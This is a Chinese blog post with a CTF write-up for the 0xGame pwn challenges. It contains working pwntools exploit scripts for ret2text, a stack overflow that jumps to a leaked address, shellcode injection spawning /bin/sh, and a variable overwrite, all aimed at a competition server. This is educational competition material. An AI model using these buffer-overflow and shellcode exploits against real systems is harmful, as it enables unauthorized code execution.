Pwn_0xGame_01

最新推荐文章于 2023-10-31 23:40:52 发布
最新推荐文章于 2023-10-31 23:40:52 发布
阅读量542 收藏 1
点赞数
分类专栏: CTF Pwn 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YangZiTrick/article/details/109146604
版权
Pwn 同时被 2 个专栏收录
16 篇文章 2 订阅
订阅专栏
CTF
5 篇文章 0 订阅
订阅专栏

Pwn_0xGame

1.欢迎来到0xGame平台

nc出flag

2.帮我取一个题目名称

ret2text

打开IDA分析
main函数
在这里插入图片描述
跟进
第二个函数
在这里插入图片描述
s栈大小为20h=32
函数最后return read了s
所以很好写了
因为是64位程序,后面再加上8个字符

payload = 'a' * (0x20+8)

Shift+F12发现/bin/sh
在这里插入图片描述

exp:

from pwn import* 
p = remote('39.101.210.214 ',10002) 
payload = 'a' * (0x20+8) + p64(0x401172)
p.sendline(payload) 
p.interactive()

3.easy_stack

文件
easy_stack.txt:

────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────
EAX 0xffffcff0 ◂— 0x0
EBX 0x56558fb8 ◂— 0x3ec0
ECX 0xffffffff
EDX 0xffffffff
EDI 0xf7fa7000 (GLOBAL_OFFSET_TABLE) ◂— 0x1dfd6c
ESI 0xf7fa7000 (GLOBAL_OFFSET_TABLE) ◂— 0x1dfd6c
EBP 0xffffd078 —▸ 0xffffd088 ◂— 0x0
ESP 0xffffcfe0 ◂— 0x0
EIP 0x56556273 —▸ 0xfffdb8e8 ◂— 0x0
─────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────
► 0x56556273 call read@plt <0x56556030>
0x56556278 add esp, 0x10
0x5655627b nop
0x5655627c mov ebx, dword ptr [ebp - 4]
0x5655627f leave
0x56556280 ret
──────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ esp 0xffffcfe0 ◂— 0x0
01:0004│ 0xffffcfe4 —▸ 0xffffcff0 ◂— 0x0
02:0008│ 0xffffcfe8 ◂— 0x100
03:000c│ 0xffffcfec —▸ 0x56556234 ◂— 0x2d84c381
04:0010│ eax 0xffffcff0 ◂— 0x0
… ↓

► 0x56556273 call read@plt <0x56556030>
调用了read函数,再看看read函数中的三个参数

read (fd, char *buf , count)

fd:文件描述符(文件指针) //fd写0,表示标准输入
buf:指向内存的指针 //也就是把数据写入的起始地址
count:读取的长度

再结合文件中

00:0000│ esp 0xffffcfe0 ◂— 0x0
01:0004│ 0xffffcfe4 —▸ 0xffffcff0◂— 0x0
02:0008│ 0xffffcfe8 ◂— 0x100

然后我们再观察ebp和eax的值

EAX 0xffffcff0 ◂— 0x0
EBP 0xffffd078 —▸ 0xffffd088 ◂— 0x0

因为通常返回地址是存在ebp下,所以计算一下偏移量 0xffffd078 - 0xffffcff0 = 0x88
read读取的数据长度是0x100
0x88 < 0x100
所以存在溢出
nc连接会回显个地址,并且这个地址是随机的
在这里插入图片描述
我们可以接收这个地址并让程序执行它
exp:


from pwn import* 
p = remote('39.101.210.214',10008) 
p.recvuntil('magic_address ') 
shell = int(p.recv(10),16) 
p.send('a' * (0x88+4) + p32(shell)) 
p.interactive()

4.该怎么起名呢

shellcode

题目让我们执行shellcode,但程序是64位的,pwntools生成的shellcode是32位的,所以我们需要设置架构
context.arch=‘AMD64’
否则有可能会报错
再看IDA
在这里插入图片描述
关键的在下面的buf+32
所以我们需要填充32个字符之后再送出shellcode

生成 shellcode

asm(shellcraft.sh())

运行一下文件
在这里插入图片描述
需要在’shellcode’之后再发送payload
所以要recvuntil(‘shellcode’)
exp:

from pwn import* 
context.arch = 'AMD64' 
p = remote('39.101.210.214',10003)
payload = 'a' * 32 + asm(shellcraft.sh())
p.recvuntil('shellcode')
p.sendline(payload)
p.interactive()

5.variable_coverage

变量覆盖

IDA分析下
在这里插入图片描述
程序读取%lld 一个longlong的数,它的长度为8个字节
后面判断v5等于0x2333后会调用system函数
构造payload = 0x233300000000
再看栈
在这里插入图片描述
4个字节的长度刚好是0x 0000 2333 0000 0000
也可以直接写0x233300000000,系统会自动填充前面的4个0,因为这是16进制的数
exp:

from pwn import* 

p = remote('39.101.210.214',10007) 

payload =  str(0x233300000000) 

p.sendline(payload)

p.interactive()
_Trick_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Pwn_0xGame_02
Trick的博客
11-08 439
Pwn_0xGame_021.Pwn题滞销,帮帮我好吗?syscall 1.Pwn题滞销,帮帮我好吗? syscall IDA打开 发现是个syscall的题目 直接去看这个函数的汇编 根据师傅们所说,我们需要让rax存入59,让syscall去调用execve函数 (ret2syscall?) syscall_64 GitHub查询 之后要构造出来 execve("/bin/sh",0,0) 拿取权限 找"/bin/sh"字符串 方法一: 在程序中有,找到它 从’[‘数起到斜杠前面的空格’ ',再
PWN-COMPETITION-0xGame2021
P1umH0的博客
11-04 1126
PWN-COMPETITION-0xGame2021Pwn?!ret2textWTF?Shellcode!No BackDoor!ret2libc pro maxWhere is my stack?!N1k0la's_lovestupid repeaterezpwn?leak mecanary eats pieN1k0la's love 2.0 Pwn?! ret2text WTF?Shellcode! No BackDoor! ret2libc pro max Where is my stack?! N1
0xGame Crypto 复现(Week3)
Luiino的博客
10-23 479
利用维纳攻击脚本解出d,之后就是基础的rsa解密。签名的相关攻击,注意到本题两次签名使用了相同的k。块密码,把加密的过程逆过来。
0xGame Crypto 复现(Week1)
Luiino的博客
10-05 466
第二步,一开始以为是摩斯,就 这 ¿和不 会 吧?代表.和-,但每个字符间都有空格,经大佬提示才知道是阴阳怪气编码,确实够阴阳怪气的,长见识了。注意%u7b代表"{",%u7d代表"}",即得到:0W_1QIN4WN_D_FR{DL1C_JYLPDNA3GCY}X1S3J。去提交却不对,怎么也搞不懂,难道和密文格式有关?第三步,摩斯密码,空格作为分隔符。
0xGame Crypto 复现(Week2)
Luiino的博客
10-11 499
加密脚本看不太懂,结合output文件,大致意思是,形成32个多项式,每个多项式均有-,需要你解出-,最终的flag提示你将-全加起来,在进行md5加密。如此多的等式、变量,以及这么大的系数,单纯去解是不太现实的。题目提示去用Sage解,去搜了搜相关方法:解出-刚开始做,没做任何分析,直接从part1准备开解,然后发现part1就给了n和e,n还无法分解,让我无法下手。
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
南京邮电大学网络攻防新星赛0xGame2020开源题目.zip
08-21
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。 全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。
南邮0xGame 2021 Crypto WriteUps
weixin_56678592的博客
11-05 1215
南邮0xGame Crypto WriteUps 记录几道南邮新生赛的题目学习学习。 #1 Wilson 题目: from Crypto.Util.number import getPrime, bytes_to_long from gmpy2 import next_prime # length of flag is 37 p = getPrime(512) q = next_prime(p) f = open('flag.txt', 'rb') flag = bytes_to_long(f.read(
南邮0xGame2020 Wp(Web)
HackerNei的博客
11-04 1829
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
pwn手记录题1
njh18790816639的博客
02-12 642
将fake_chunk链入到了unsortedbin之中了,并且伪造了fake_chunk的fd指针指向unsortedbin;不过发现了几遍文章,其中存在着解析,将其引向了retfq该指令,该指令意思是64位与32位之间进行跳转,而syscall_fstat的rax为5,32位之中的open的syscall_number同样为5;我们发现了一个函数change_addr函数,其实就是PIE,本题开启了PIE保护,但是却又多此一举改变了地址,不懂;不过编写shellcode的时候废了好大劲,调试了好久;
第一道pwn栈溢出题
小白垃圾笔记2
03-03 886
代码和解题思路来自启明星辰的《ctf安全竞赛入门》,当然还有好多热心的师傅们的指导。
2021羊城杯 pwn whats your name
yongbaoii的博客
09-24 317
libc是2.23的。 保护是全开的。 沙箱是有的。 菜单。 set name edit name puts name delete name
0xGame2023
最新发布
Fab1an的博客
10-31 433
Hint 1: 如果我的hide是steghide那你该如何seek呢?参考其他师傅的博客还有用工具Steghide发现需要密码,咱没有密码只能用stegseek工具爆破运行之后在同目录下下发现flag文件。
nepctf pwn easystack(_stack_chk_fail)
qq_51868336的博客
03-24 924
这道题考察的是对_stack_chk_fail的利用 _stack_chk_fail 简单来说就是检测到canary被修改后就会触发_stack_chk_fail函数抛出异常并结束进程,这个函数的利用点在于它调用 _fortify_fail 来输出异常信息,其中包含libc_argv[0]指向的程序名 void __attribute__ ((noreturn)) __stack_chk_fail (void) { __fortify_fail ("stack smashing detected");
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3682
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过计算偏移量得到libc的基址,进而计算出system函数和/bin/sh字符串的地址。最后,通过构造ROP链来调用system函数,并将/bin/sh字符串作为参数传入,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [[BUUCTF]PWN——xdctf2015_pwn200](https://blog.csdn.net/mcmuyanga/article/details/109622553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [xdctf2015_pwn200](https://blog.csdn.net/weixin_44309300/article/details/130628776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值